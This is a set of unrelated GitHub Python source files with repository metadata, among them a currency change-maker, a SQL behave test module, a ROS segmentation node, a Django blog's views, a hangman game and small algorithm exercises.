21394122423 | Denominations = {1:[2000,500,200,100,50,20,10,5,2,1],2:[100,50,20,10,5,2,1,0.50,0.25,0.10,0.05,0.01],3:[50,20,10,5,2,1,0.5,0.2,0.1,0.05,0.02,0.01],4:[10000,5000,2000,1000,500,100,50,10,5,1],5:[100,50,20,10,5,2,1,0.5,0.2,0.1,0.05,0.02,0.01]}
def checkval(s):
while(True):
value = input("--> Enter the amount you wish to obtain the equivalent change for: ")
try:
value = float(value)
if value < 0:
print(".\n"*3)
print(" ERROR !!! YOU HAVE ENTERED A NEGATIVE VALUE !!! PLEASE TRY AGAIN !!!")
else:
low_val_check = min(Denominations[s])
if value<=low_val_check:
print(".\n"*3)
print(" ERROR !!! LOWER DENOMINATION DOES NOT EXIST, PLEASE ENTER A VALUE FOR WHICH CHANGE CAN BE OBTAINED !!!")
else:
if s == 1 or s == 4:
print("\nYour Number Might be Rounded to the nearest integer due to Notes existing only in integer formats given the chosen currency. . . . ")
return round(value)
elif s == 2 or s==3 or s==5 :
print("\nYour Number Might be Rounded to 2 decimal places due to Notes existing only in integer formats given the chosen currency. . . . ")
return round(value,2)
except ValueError:
print(".\n"*3)
print("YOUR ENTRY HAS INVALID CHARACTERS IN IT !!! PLEASE ENTER A NUMERICAL AMOUNT !!!")
def checkcurr(s):
while(True):
try:
s = int(s)
if 1<=s<=5:
return s
else:
print(".\n"*3)
print("ERROR !!! NUMBER NOT IN SPECIFIED RANGE !!! PLEASE TRY AGAIN !!! \n")
s = input("Enter The Numerical Value for your desired currency: ")
except ValueError:
print(".\n"*3)
print("ERROR !!! ENTRY CONTAINS INVALID CHARACTERS !!! PLEASE TRY AGAIN !!! \n")
s = input("Enter The Numerical Value for your desired currency: ")
def calc_change(c,a):
list_of_denominations = Denominations[c]
string = "Your Change is :"
flag = 0
for i in list_of_denominations:
if a!=i:
flag = 1
if a >= i and flag == 1:
part_of_change = int(a/i)
part_of_change = str(part_of_change)
a = a%i
if c == 1:
if i > 5:
string += " ' "+part_of_change+"' "+str(i)+' Rupee Note/s'
else:
string += " ' "+part_of_change+"' "+str(i)+' Rupee Coin/s'
elif c== 4:
if i >= 1000:
string += " ' "+part_of_change+"' "+str(i)+' Yen Note/s'
else:
string += " ' "+part_of_change+"' "+str(i)+' Yen Coin/s'
elif c== 2:
if i >= 1:
string += " ' "+part_of_change+"' "+str(i)+' Dollar Note/s'
elif i == 0.01:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' Penny/ies'
elif i == 0.05:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' nickel/s'
elif i == 0.1:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' Dime/s'
elif i==0.25:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' Quarter/s'
elif i==0.5:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+'Half Dollar/s'
elif c == 3:
if i >= 5:
string += "' "+part_of_change+"' "+str(i)+' Pound Note/s'
elif i==2 or i == 1:
string += " ' "+part_of_change+"' "+str(i)+' Pound Coin/s'
else:
string += " ' "+part_of_change+"' "+str(i)+' Pence'
else:
if i >= 0.1:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' Yuan Note/s'
else:
temp = int(i*100)
string += " ' "+part_of_change+"' "+str(temp)+' Yuan Coin/s'
return string
def main():
ans = 'y'
while(ans == 'y'):
print(" "*10+"*-"*35+"*")
print(" "*35+"COIN CHANGE MAKER")
print(" "*10+"*-"*35+"*","\n")
print("--> Choose the NUMERICAL VALUE corresponding to the currency you wish to obtain the change in :\n1) Indian Rupee (₹) \n2) American Dollar ($) \n3) British Pound (£) \n4) Japanese Yen (¥) \n5) Chinese Yuan (CN¥) \n")
int_value = input("Enter The Numerical Value for your desired currency: ")
currency = checkcurr(int_value)
print(".\n"*3)
print("OPTION SAVED......\n")
amount = checkval(currency)
print(".\n"*3)
print("OPTION SAVED......\n")
answer = calc_change(currency,amount)
print(answer)
print("Do you wish to continue using the Program ? Press 'y' to continue and 'n' to terminate")
ans = input()
while(True):
if ans not in ['y','n']:
print("ERROR !!! INVALID ENTRY DETECTED !!! PLEASE TRY AGAIN !!!")
print(".\n"*3)
print("Do you wish to continue using the Program ? Press 'y' to continue and 'n' to terminate")
ans = input()
else:
break
if __name__ == "__main__":
main() | ar0757/Change_giving_program | Change_Giver.py | Change_Giver.py | py | 5,856 | python | en | code | 0 | github-code | 36 |
9487574383 | import os, glob
from sqlalchemy import *
import sqlalchemy.exc
from sqlalchemy.orm import sessionmaker
from parse import *
from lxml import etree
from datetime import datetime, date, time
step_types = {
'given': 0,
'when': 1,
'then': 2
}
curpath = os.path.basename(os.getcwd())
if curpath == 'steps':
os.chdir('..')
if curpath == 'features':
os.chdir('..')
global_vars = dict()
connect_config = dict()
link_config = dict()
try:
exec(open("./settings.py").read(), global_vars)
except FileNotFoundError:
try:
exec(open("../settings.py").read(), global_vars)
except FileNotFoundError:
pass
try:
connect_config = global_vars['connect_config']
link_config = global_vars['link_config']
except:
pass
class TestModule:
def __init__(self, module_name):
self.module_name = module_name
self.results = []
self.connect_list = dict()
def run_predicate_from_file(self, predicate, step_type):
predicate_template = "./features/steps/{step_type}*.sql"
param_value_tmpl = "--!{param}={value}"
predicate_format = predicate_template.format(step_type=step_type)
params = dict()
filename_params = dict()
sql_command = ""
is_sql_command = 0
filename = ""
cmd = ""
decl = 'DECLARE @context XML,\n@table XML,\n'
prms = "\t@context = @context OUTPUT,\n"
prms += "\t@table = @table,\n"
def process_file(fn):
sql_command = ""
is_sql = 0
schema = ""
proc_name = ""
with open(g, 'r') as f:
for line in f:
p = parse(param_value_tmpl, line)
if p != None and len(p.named) > 0:
params[p.named['param']] = p.named['value']
sql_command += line
try:
sql_command = 'EXEC {}.{}'.format(params['schema_name'], params['proc_name'])
schema, proc_name = params['schema_name'], params['proc_name']
except:
is_sql = 1
return sql_command, is_sql, schema, proc_name
for g in glob.iglob(predicate_format):
filename = os.path.basename(os.path.splitext(g)[0])
step_filename = "{0} {1}".format(step_type, predicate)
if filename == step_filename:
cmd, is_sql_command, schema, proc_name = process_file(g)
break
else:
fd = parse(filename, step_filename)
if fd != None and len(fd.named) > 0:
for k in fd.named:
vl = fd.named[k]
decl += "\t@{} NVARCHAR(128) = '{}',\n".format(k, vl)
prms += "\t@{} = @{},\n".format(k, k)
cmd, is_sql_command, schema, proc_name = process_file(g)
break
context = etree.Element("context")
table = etree.SubElement(context, "table")
if self.ctx_table is not None:
for ct in self.ctx_table:
row = etree.SubElement(table, 'row')
for hd in ct.headings:
row.set(hd, ct[hd])
ctx_str = etree.tostring(context)
if len(cmd) > 0:
ctx_str = str(ctx_str.decode("utf-8")).replace("'", "''")
decl = decl[:-2] + "\n\nSET @table = '{}'".format(ctx_str)
try:
decl += "\n\nSET @context = '{}'".format(self.ctx_xml)
except AttributeError:
pass
cmd = decl + "\n\n" + cmd + "\n"
cmd += prms[:-2] if is_sql_command == 0 else ''
cmd += "\n\nSELECT @context AS behave_result"
if params['connect'] in link_config:
params['connect'] = link_config[params['connect']]
engine = create_engine(params['connect'])
maker = sessionmaker(bind=engine)
session = maker()
row = None
trans = session.begin(subtransactions=True)
try:
session.execute("SET DATEFORMAT dmy;")
res = session.execute(text(cmd))
if res.cursor != None:
while 'behave_result' != res.cursor.description[0][0]:
names = [c[0] for c in res.cursor.description]
store_results = []
while 1:
row_raw = res.cursor.fetchone()
if row_raw is None:
break
row = dict(zip(names, row_raw))
store_results.append(row)
self.results.append(store_results)
res.cursor.nextset()
row = res.cursor.fetchone()
res.close()
session.execute('IF @@TRANCOUNT > 0 BEGIN COMMIT END')
except:
print(cmd)
raise
# процедура или скрипт вернули данные
rs_xml = etree.Element("results")
rs_xml.set('step_type', step_type)
rs_xml.set('predicate', predicate)
for res_set in self.results:
rset_xml = etree.SubElement(rs_xml, "result_set")
for res_row in res_set:
rrow_xml = etree.SubElement(rset_xml, "row")
for res_col in res_row:
res_col4xml = 'empty' if len(res_col) == 0 else res_col
rrow_xml.set(res_col4xml, str(res_row[res_col]))
session.close()
if row != None:
if row[0] is None:
ctx_out_xml = etree.Element("context")
else:
ctx_out_xml = etree.XML(row[0])
ctx_out_xml.append(rs_xml)
return etree.tostring(ctx_out_xml).decode('utf-8')
return None
| AlexandrMov/sqlbehave | sqlbehave/testmodule.py | testmodule.py | py | 5,971 | python | en | code | 0 | github-code | 36 |
17743117135 | n = int(input())
cached = {}
def f(n):
if n in cached:
return cached[n]
if 0 <= n <= 1:
return 1
f_n = f(n-1) + f(n-2)
cached[n] = f_n
return f_n
print(f(n)) | baocogn/self-learning | big_o_coding/Green_06/day_9_quiz_8_FIBONACCI.py | day_9_quiz_8_FIBONACCI.py | py | 200 | python | en | code | 0 | github-code | 36 |
28067802602 | # 퐁당퐁당 안된다 선입후출 !
import sys
input = sys.stdin.readline
n = int(input())
count = 0
for _ in range(n) :
word = list(map(str, input()))
word.pop() # 맨뒤에 '/n'를 제거 위함
stack = []
for i in range(len(word)) :
if len(stack) == 0 :
stack.append(word[i])
else :
if word[i] == stack[-1] :
stack.pop()
else :
stack.append(word[i])
if len(stack) == 0 :
count += 1
print(count)
| hwanginbeom/algorithm_study | 1.algorithm_question/3.stack,queue/66.Stack_sejin.py | 66.Stack_sejin.py | py | 520 | python | en | code | 3 | github-code | 36 |
34162683454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import tempfile
from subprocess import PIPE, Popen
import os
import random
import codecs
import math
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from resources import SEMEVAL_SCORER_PATH
logger = logging.getLogger(__name__)
def pretty_pipeline(obj):
"""Pretty print a sklearn Pipeline.
This function is especially useful to extract information within
FeatureUnion Pipeline.
Args:
obj: A sklearn Pipeline.
Returns:
A flat version of the Pipeline object.
"""
if isinstance(obj, list):
return [pretty_pipeline(o) for o in obj]
elif isinstance(obj, FeatureUnion):
return {'n_jobs': obj.n_jobs,
'transformer_list': obj.transformer_list,
'transformer_weights': obj.transformer_weights}
elif isinstance(obj, Pipeline):
return {'steps': pretty_pipeline(obj.steps)}
elif isinstance(obj, tuple):
return pretty_pipeline(list(obj))
else:
return obj
def strings_to_integers(strings, labels):
"""Convert an array of strings to an array of integers.
Convert an array of strings to an array of integers where the same
string will always have the same integers value.
Args:
strings: An array of strings.
Returns:
An array of integers
"""
integers = []
for string in strings:
integers.append(labels.index(string))
return integers
def integers_to_strings(integers, labels):
"""Convert an array of integers to an array of strings using labels as
reference.
Args:
integers: An array of integers.
labels: An array of strings where each integers will be
replaced by the string at the index.
Returns:
An array of strings.
"""
strings = []
for integer in integers:
strings.append(labels[integer])
return strings
def merge_classes(lst, classes, new_class):
"""Merge classes from lst into one new_class.
Args:
lst: A list of classes that will be replaced (strings).
classes: A list of classes to replace (strings).
new_class: The new class (string).
Returns:
The list with all occurences of classes replaced by new_class.
"""
for i in range(len(lst)):
if lst[i] in classes:
lst[i] = new_class
return lst
def eval_with_semeval_script(test, predicted):
"""Eval prediction on test with semeval script (T4SA).
Args:
test: variable documentation.
predicted: variable documentation.
Returns:
Returns information
Raises:
IOError: An error occurred.
"""
predicted = integers_to_strings(predicted, test.labels)
ofile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
ret = None
try:
for (sid, pred) in zip(test.sid, predicted):
ofile.write('%s\t%s\n' % (sid, pred))
ofile.close()
p = Popen(['_scripts/SemEval2016_task4_test_scorer_subtaskA.pl',
ofile.name], stdout=PIPE, stderr=PIPE, cwd=SEMEVAL_SCORER_PATH)
out, err = p.communicate()
ret = out + err
ret = ret.decode()
with open(ofile.name + '.scored', 'r') as ifile:
for line in ifile:
ret += line
finally:
if not ofile.closed:
ofile.close()
os.remove(ofile.name)
os.remove(ofile.name + '.scored')
return ret
def assoc_value(lst, value):
"""Return the element associated to value and its index.
Args:
lst: A associative array/list.
value: The value to match on.
Returns:
The element associated to value (with the value itself) and
its index.
"""
for (idx, el) in enumerate(lst):
if el[0] == value:
return el, idx
def invert_dict_nonunique(d):
newdict = {}
for k in d:
newdict.setdefault(d[k], []).append(k)
return newdict
def split_train_valid(input_path, valid_num=3000):
"""Split a file in two (.valid and .train) with valid_num lines in
.valid and everything else in .train.
"""
train_path = input_path + '.train'
valid_path = input_path + '.valid'
nb_line = 0
with codecs.open(input_path, 'r', 'utf-8') as ifile:
nb_line = len([line for line in ifile])
if valid_num <= 1 and valid_num >= 0:
valid_num = math.floor(nb_line * valid_num)
valid_indexes = random.sample(range(nb_line), valid_num)
try:
ifile = codecs.open(input_path, 'r', 'utf-8')
train_file = codecs.open(train_path, 'w+', 'utf-8')
valid_file = codecs.open(valid_path, 'w+', 'utf-8')
idx = 0
for line in ifile:
try:
v_idx = valid_indexes.index(idx)
valid_file.write(line)
del valid_indexes[v_idx]
except ValueError:
train_file.write(line)
idx += 1
finally:
ifile.close()
train_file.close()
valid_file.close()
def opinion_lexicon_to_graph(lexicon):
"""Return a undirected graph from lexicon.
LEXICON is an opinion lexicon where each key is a class and the value
associated to it is a list of words that belongs to the class.
This function will build a undirected graph where each node are words
and the edges between nodes represent a similarity relationship. There
will be an edge between two words if they belong to the same class.
In practice, this method returns a dictionnary where a key is a word
of LEXICON and the value associated to it are all words from the same
class.
This is intended to be used by emb.build_custom3
"""
ret = {}
lexicon_inv = invert_dict_nonunique(lexicon)
for c in lexicon_inv:
words = lexicon_inv[c]
for word in words:
ret[word] = words
return ret
def split_lexicon_train_test(lexicon, ratio=0.9, shuffle=False):
"""Split each class of the lexicon in train and test.
Args:
lexicon: A lexicon to split.
ratio: The ratio of train/test. 0.9 means 90% of the lexicon
will go in the train lexicon.
shuffle: A boolean to specify that the lexicon should be
shuffled before splitting.
Returns:
A train lexicon and a test lexicon.
"""
train_lexicon = {}
test_lexicon = {}
lexicon_inv = invert_dict_nonunique(lexicon)
for c in lexicon_inv:
c_words = lexicon_inv[c]
n = len(c_words)
if shuffle:
random.shuffle(c_words)
limit = math.floor(n * ratio)
for w in c_words[:limit]:
train_lexicon[w] = c
for w in c_words[limit:]:
test_lexicon[w] = c
return train_lexicon, test_lexicon
def remove_multi_words_in_lexicon(lexicon):
"""Remove multi-words in lexicon"""
ret = {}
for w in lexicon:
if len(w.split(' ')) == 1:
ret[w] = lexicon[w]
return ret
| daimrod/opinion-sentence-annotator | utils.py | utils.py | py | 7,027 | python | en | code | 0 | github-code | 36 |
21924375123 | #!/usr/bin/env python
import unittest
from network import Arc, Node, Network
class NetworkTestCase(unittest.TestCase):
def test_basic(self):
node = Node('one')
nw = Network([node])
self.assertEqual(nw.find_node('one'), node)
node = Node(('two', 2))
nw.add_node(node)
self.assertEqual(nw.find_node(('two', 2)), node)
three = Node('three')
arc = Arc(three, 1)
nw.find_node('one').add_arc(arc)
self.assertEqual(nw.find_node('three'), three)
def test_dont_lose_nodes(self):
n1 = Node(1)
n2 = Node(2)
n1.add_arc(Arc(n2))
nw = Network([n1])
self.assertEqual(nw.find_node(2), n2)
n3 = Node(3)
n2.add_arc(Arc(n3))
self.assertEqual(nw.find_node(3), n3)
def test_has_arc(self):
n1 = Node(1)
n2 = Node(2)
a = Arc(n2)
n1.add_arc(a)
self.assertTrue(n1.has_arc(a))
def test_to_node(self):
n2 = Node(2)
a = Arc(n2)
self.assertTrue(a.to_node() == n2)
def test_flow(self):
n2 = Node(1)
a = Arc(n2)
self.assertTrue(a.total_flow() == 0)
self.assertTrue(a.flow() == 0)
a.set_flow(3)
self.assertTrue(a.flow() == 3)
a.set_flow(3, 'red')
self.assertTrue(a.flow('red') == 3)
self.assertEqual(a.total_flow(), 6)
if __name__ == '__main__':
unittest.main()
| sh4rkfin/misc | python/network_test.py | network_test.py | py | 1,441 | python | en | code | 0 | github-code | 36 |
35742603936 | #!/usr/bin/env python3
import jetson.inference
import jetson.utils
import rospy
import os
import numpy as np
import cv2
import ctypes
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
class semanticSegmentation:
def __init__(self, topics_to, network, labels_file, camera_info):
# Create labels name list
with open(labels_file) as labels:
lines = labels.readlines()
self._object_class = [label.strip() for label in lines]
# Camera width and height
self._CAMERA_WIDTH = camera_info.width
self._CAMERA_HEIGHT = camera_info.height
self._FILTER_MODE = "point"
self._IGNORE_CLASS = "void"
self._ALPHA = 175.0
# Initialize network
self._net = jetson.inference.segNet(network)
# set the alpha blending value
self._net.SetOverlayAlpha(self._ALPHA)
# allocate the output images for the overlay & mask
self._img_overlay = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
self._img_mask = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
self._bridge = CvBridge()
# Create semantic segmentation overlay and mask frame publisher
self._overlay_publisher = rospy.Publisher(topics_to['overlay'], Image, queue_size=1)
self._mask_publisher = rospy.Publisher(topics_to['mask'], Image, queue_size=1)
def detect(self, data):
# Receive frame from camera
try:
frame = self._bridge.imgmsg_to_cv2(data, "rgb8")
except CvBridgeError as e:
print(e)
# Convert frame to RGBA
rgba_frame = cv2.cvtColor(frame, cv2.COLOR_RGB2RGBA)
# Convert frame to CUDA
cuda_mem = jetson.utils.cudaFromNumpy(rgba_frame)
# process the segmentation network
self._net.Process(cuda_mem, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._IGNORE_CLASS)
# generate the overlay and mask
self._net.Overlay(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
self._net.Mask(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
# Return frame to numpy arrray
overlay_frame = jetson.utils.cudaToNumpy(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
mask_frame = jetson.utils.cudaToNumpy(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
# Convert RGBA frame to RGB
overlay_frame = cv2.cvtColor(overlay_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
mask_frame = cv2.cvtColor(mask_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
test_frame = np.zeros_like(mask_frame)
test_frame[np.where((mask_frame==[220, 20, 60]).all(axis=2))] = (255, 255, 255)
# Publish semantic segmentation frame
try:
self._overlay_publisher.publish(self._bridge.cv2_to_imgmsg(overlay_frame, encoding="rgb8"))
self._mask_publisher.publish(self._bridge.cv2_to_imgmsg(test_frame, encoding="rgb8"))
rospy.loginfo("Published semantic segmentation frame")
except CvBridgeError as e:
print(e)
def main():
rospy.init_node('semantic_segmentation')
NETWORK = rospy.get_param('network', "fcn-resnet18-cityscapes-512x256")
LABELS_FILE = rospy.get_param('labels_file', '/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation/networks/FCN-ResNet18-Cityscapes-512x256/classes.txt')
LEFT_CAMERA_INFO = rospy.wait_for_message('/prius/right_camera/camera_info', CameraInfo)
os.chdir('/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation')
TOPIC_FROM = "/prius/left_camera/image_raw"
TOPICS_TO = {'overlay':"/semantic_segmentation/image_overlay",
'mask':"/semantic_segmentation/image_mask"}
semantic_segmentation = semanticSegmentation(TOPICS_TO, NETWORK, LABELS_FILE, LEFT_CAMERA_INFO)
rawframe_subscriber = rospy.Subscriber(TOPIC_FROM, Image, semantic_segmentation.detect, buff_size=2**24, queue_size=2)
rate = rospy.Rate(30)
try:
while not rospy.is_shutdown():
rate.sleep()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("Shutting down")
if __name__ == "__main__":
main()
| ZiadGhanem/Adaptive-Cruise-Control-Application | graduation_project_pkgs/graduation_project_simulation/scripts/semantic_segmentation/semantic_segmentation.py | semantic_segmentation.py | py | 4,078 | python | en | code | 0 | github-code | 36 |
26946898269 | import numpy as np
import rogues
def dramadah(n, k=1):
"""
dramadah a (0,1) matrix whose inverse has large integer entries.
An anti-hadamard matrix a is a matrix with elements 0 or 1 for
which mu(a) := norm(inv(a),'fro') is maximal.
a = dramadah(n, k) is an n-by-n (0,1) matrix for which mu(a) is
relatively large, although not necessarily maximal.
Available types (the default is k = 1):
k = 1: a is toeplitz, with abs(det(a)) = 1, and mu(a) > c(1.75)^n,
where c is a constant.
k = 2: a is upper triangular and toeplitz.
the inverses of both types have integer entries.
Another interesting (0,1) matrix:
k = 3: A has maximal determinant among (0,1) lower Hessenberg
matrices: det(A) = the n'th Fibonacci number. A is Toeplitz.
The eigenvalues have an interesting distribution in the complex
plane.
References:
R.L. Graham and N.J.A. Sloane, Anti-Hadamard matrices,
Linear Algebra and Appl., 62 (1984), pp. 113-137.
L. Ching, The maximum determinant of an nxn lower Hessenberg
(0,1) matrix, Linear Algebra and Appl., 183 (1993), pp. 147-153.
"""
if k == 1:
# Toeplitz
c = np.ones(n)
for i in range(1, n, 4):
m = min(1, n - i)
c[i:i + m + 1] = 0
r = np.zeros(n)
r[0:4] = np.array([1, 1, 0, 1])
if n < 4:
r = r[0:n]
a = rogues.toeplitz(c, r)
elif k == 2:
# Upper triangular and Toeplitz
c = np.zeros(n)
c[0] = 1
r = np.ones(n)
r[2::2] = 0
a = rogues.toeplitz(c, r)
elif k == 3:
# Lower Hessenberg.
c = np.ones(n)
c[1::2] = 0
a = rogues.toeplitz(c, np.hstack((np.array([1, 1]), np.zeros(n - 2))))
return a
| macd/rogues | rogues/matrices/dramadah.py | dramadah.py | py | 1,919 | python | en | code | 16 | github-code | 36 |
35860493029 | import allure
from integration_template.forms.main_form import MainForm, TypeOfTesting
from tests.test_base import TestBase
class TestMainForm(TestBase):
main_form = MainForm()
def setup(self):
with allure.step("Go to main page"):
self.go_to_start_page()
with allure.step("Main page is displayed"):
assert self.main_form.state.is_displayed()
assert self.main_form.label_nav_header.state.wait_for_displayed()
def test_main_page(self):
with allure.step("Check Navigation menu items"):
assert len(self.main_form.nav_menu_buttons()) == 4
with allure.step("Check base elements"):
assert self.main_form.contact_us.state.is_displayed()
for type_of_testing in TypeOfTesting:
assert self.main_form.type_of_testing_button(type_of_testing).state.is_displayed()
| Polmik/py-selenium-auto-template | tests/main_form/test_main_form.py | test_main_form.py | py | 889 | python | en | code | 0 | github-code | 36 |
31868481915 | import CRUD
while True:
ListaTareas = CRUD.Leer()
print("\n---------------------------------------")
print("Aplicación CRUD")
print("1. Adicionar Tarea")
print("2. Consultar Tareas")
print("3. Actualizar Tarea")
print("4. Eliminar Tarea")
print("5. Salir")
opcion = input("\nIngrese una opción: ")
print("---------------------------------------\n")
if opcion == "1":
nombre = input("Ingrese el nombre de la tarea >> ")
descrp = input("Describa la tarea >> ")
estado = input("Estado actual de la tarea >> ")
try:
tiempo = float(input("Ingrese el tiempo destinado para la tarea (minutos) >> "))
except:
print("Error. Tiempo debe ser un número.")
continue
CRUD.Crear(
nombre,
{"Descripcion":descrp, "Estado Actual":estado, "Tiempo":tiempo}
)
elif opcion == "2":
print("Lista de tareas guardadas:\n")
for i, Tarea in enumerate(ListaTareas):
print(f"{i+1}: {Tarea}:\n")
Tarea = ListaTareas[Tarea]
print(f"Descripción: {Tarea['Descripcion']}")
print(f"Estado Actual: {Tarea['Estado Actual']}")
print(f"Tiempo: {Tarea['Tiempo']}")
elif opcion == "3":
nombre = input("Ingrese el nombre de la tarea >> ")
if nombre not in ListaTareas: print("La tarea no existe.")
else:
descrp = input("Describa la tarea >> ")
estado = input("Estado actual de la tarea >> ")
try:
tiempo = float(input("Ingrese el tiempo destinado para la tarea (minutos) >> "))
except:
print("Error. Tiempo debe ser un número.")
continue
CRUD.Crear(
nombre,
{"Descripcion":descrp, "Estado Actual":estado, "Tiempo":tiempo}
)
elif opcion == "4":
nombre = input("Ingrese el nombre de la tarea >> ")
if nombre not in ListaTareas: print("La tarea no existe.")
else:
CRUD.Eliminar(nombre)
print("Se ha eliminado la tarea.")
elif opcion == "5":
print("\nGracias por utilizar este servicio 😁\n")
break
else:
print("\nOpción no disponible. Inténtelo de nuevo") | deiividramirez/MisionTIC2022 | Ciclo 1 (Grupo 36)/Clases/ControladorCRUD.py | ControladorCRUD.py | py | 2,587 | python | es | code | 0 | github-code | 36 |
6254269803 | from __future__ import unicode_literals
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post, Tag
from .forms import PostAddForm
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def delete(request, post_id):
post = get_object_or_404(Post, id=post_id)
post.delete()
return redirect('blog_app:index')
@login_required
def edit(request, post_id):
post = get_object_or_404(Post, id=post_id)
if request.method == "POST":
#instance:オブジェクトとほぼ同義でクラスを使用したデータの実体
form = PostAddForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.save()
return redirect('blog_app:detail', post_id=post.id)
else:
form = PostAddForm(instance=post)
#formにpostのデータを入れた状態のデータをadd.htmlに入れる
return render(request, 'blog_app/edit.html', {'form': form, 'post': post})
@login_required
def add(request):
#url/へ遷移してからPOSTでリクエスト出したとき
if request.method == "POST":
#リクエストがPOSTなら、formの中身とユーザーを更新してレスポンス
form = PostAddForm(request.POST, request.FILES)#FILESは画像などのファイルデータ
if form.is_valid():
#保存する前にどのuserの投稿か判断
post = form.save(commit=False)#仮登録
post.user = request.user
#記事の内容とuserの判別に成功したら保存
post.save()
return redirect('blog_app:index')
#url/へ遷移してからPOST以外のリクエスト出したとき
else:
#リクエストがPOST以外なら,特になにも更新せずにレスポンスに返す
form = PostAddForm()
#url/へ遷移してなにもしてない状態
#formにpostを入れていない空の状態のデータをadd.htmlに入れる
return render(request, 'blog_app/add.html', {'form': form})
def detail(request, post_id):
post = get_object_or_404(Post, id=post_id)
return render(request, 'blog_app/detail.html', {'post': post})
def index(request):
posts = Post.objects.all().order_by('-created_at')
return render(request, 'blog_app/index.html', {'posts': posts}) | Naoshin-hirano/blog_app | blog/blog_app/views.py | views.py | py | 2,376 | python | ja | code | 0 | github-code | 36 |
8126703324 | import random
# Choisi un mot
mots = []
with open("mots.txt") as fl:
for l in fl:
mots.append(l.rstrip("\n"))
mot = random.choice(mots)
# Variable cle
lettres = []
faux = 0
trouve = False
corps_plein = ["O", "/", "|", "\\", "/", "\\"]
corps = [" ", " ", " ", " ", " ", " "]
while not trouve:
trouve = True
print(" +---+")
print(" | |")
print(" | {}".format(corps[0]))
print(" | {}{}{}".format(corps[1], corps[2], corps[3]))
print(" | {} {}".format(corps[4], corps[5]))
print("_|_")
print("| |")
for l in mot:
if l in lettres:
print(l, end=" ")
else:
trouve = False
print("_", end=" ")
print()
print("Lettres utilisées - ", end="")
for l in lettres:
print(l, end=" | ")
print()
if faux > 5:
print("Oh non :( Tu as perdu...")
print("Le mot était : {}".format(mot))
break
if trouve:
print("Bravo ! Tu viens de remporter La partie !")
break
lettre = input("Entez une lettre: ")
lettres.append(lettre)
if lettre not in mot:
corps[faux] = corps_plein[faux]
faux += 1 | Salah78/pythonPendu | main.py | main.py | py | 1,175 | python | en | code | 1 | github-code | 36 |
41721739407 | # -*- coding:UTF-8 -*-
import numpy as np
import xlrd as xlrd
from scipy.stats import norm
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import importlib
# 参数1 Excel文件位置 参数2 选择要作图的表格 参数3、4、5 xy轴代表含义以及标题文字 参数6列数 函数可以选择某地址文件某一个表格某一列来操作
class Make_figure:
def result_pic(address, Excel_Choice,xlabel,ylabel,title,FormColumns):
# 设置字体
importlib.reload(sys)
matplotlib.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
# 读取文件
trainFile = address
if(Excel_Choice==0):
data = pd.read_excel(trainFile, 0)
elif(Excel_Choice==1):
data = pd.read_excel(trainFile, 1)
elif(Excel_Choice==2):
data = pd.read_excel(trainFile, 2)
elif(Excel_Choice==3):
data = pd.read_excel(trainFile, 3)
else:
print('输入有误!!!')
#print(data.iloc[:, 1].describe())
# 设置表格形式
# 定义x轴、y轴取值范围
x = range(0, data.iloc[:,FormColumns].count(), 1)
y = data.iloc[:, FormColumns]
# 定义折线
s = plt.plot(x, y, 'b--')
# 定义文字说明
s1 = "以太坊区块交易数"
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
plt.legend([s1], loc="upper left")
# 图片打印
plt.show()
| 357734432/Supervised-Blockchain-Simulator | Data_Output/Make_figure.py | Make_figure.py | py | 1,617 | python | en | code | 0 | github-code | 36 |
42768275908 | # Module 5
# Programming Assignment 6
# Prob-3.py
# Robert Ballenger
from graphics import *
def main():
win = GraphWin(title="Shooty Shooty Bow Target", height=400, width=400)
# Little bit of shorthand, instead of writing "Point(200, 200)" for the middle of each circle, I just assigned it a variable.
center = Point(200, 200)
# First up we work the white circle. The 160 radius seems random, but it's beceause this was the last one I started with.
whiteC = Circle(center, 160)
whiteC.setFill("white")
whiteC.draw(win)
# Notice here how the black circl is 30 radius smaller... HMMM.
blackC = Circle(center, 120)
blackC.setFill("black")
blackC.draw(win)
# Blue, just like the rest.
blueC = Circle(center, 90)
blueC.setFill("blue")
blueC.draw(win)
# Almost done, we do red, which is 30 less on the radius.
redC = Circle(center, 60)
redC.setFill("red")
redC.draw(win)
# This last one draws a yellow circle with a radius of 30, which is where I actually started.
yellowC = Circle(center, 30)
yellowC.setFill("yellow")
yellowC.draw(win)
# This last command just keeps the window open until the user clicks, with text to accompany it.
Text(Point(200, 385), "Click again to quit.").draw(win)
win.getMouse()
main()
